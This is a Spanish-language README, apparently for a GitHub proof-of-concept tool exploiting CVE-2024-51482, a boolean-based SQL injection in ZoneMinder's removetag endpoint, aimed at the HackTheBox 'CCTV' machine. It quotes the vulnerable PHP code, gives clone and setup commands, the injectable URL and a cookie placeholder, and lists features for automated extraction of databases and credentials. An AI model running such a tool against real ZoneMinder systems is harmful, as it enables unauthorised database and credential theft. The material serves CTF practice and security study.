
Scripts en Python para la explotación de CVE-2024-51482 (SQLi en ZoneMinder) — HTB CCTV
Scripts en Python para la explotación de CVE-2024-51482 (SQLi en ZoneMinder) — HTB CCTV sqli-hunter — CVE-2024-51482
Este script automatiza la extracción de bases de datos, tablas, columnas y credenciales aprovechando CVE-2024-51482, una vulnerabilidad de Boolean-based SQL Injection en el parámetro tid del endpoint removetag de ZoneMinder ≤ 1.37.64. El código vulnerable en web/ajax/event.php inserta directamente $_REQUEST['tid'] en una query SQL sin sanitiza
case 'removetag':
$tagId = $_REQUEST['tid'];
$sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId"; // ← vulnerable
$rowCount = dbNumRows($sql);
-Python 3.x
-pwntools
git clone https://github.com/lnn0v4/sqli-hunter-CVE-2024-51482-PoC.git
cd sqli-hunter-CVE-2024-51482-PoC
python3 -m venv venv
source venv/bin/activate
pip install pwntools
URL = "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid="
COOKIE = {"ZMSESSID": "TU_COOKIE_AQUI"}
python3 CVE-2024-51482.py

✅ Detección automática de latencia base
✅ Búsqueda binaria por ASCII (7x más rápido que fuerza bruta)
✅ Extracción paralela con hilos (ThreadPoolExecutor)
✅ Menú interactivo: DB → Tablas → Columnas → Datos
✅ Caché de columnas para no re-extraer
✅ Navegación entre tablas sin reiniciar el script
⚠️ Este script es solo para propósitos educativos y uso en entornos autorizados como HackTheBox. No uses este código en sistemas sin autorización explícita.
MIT License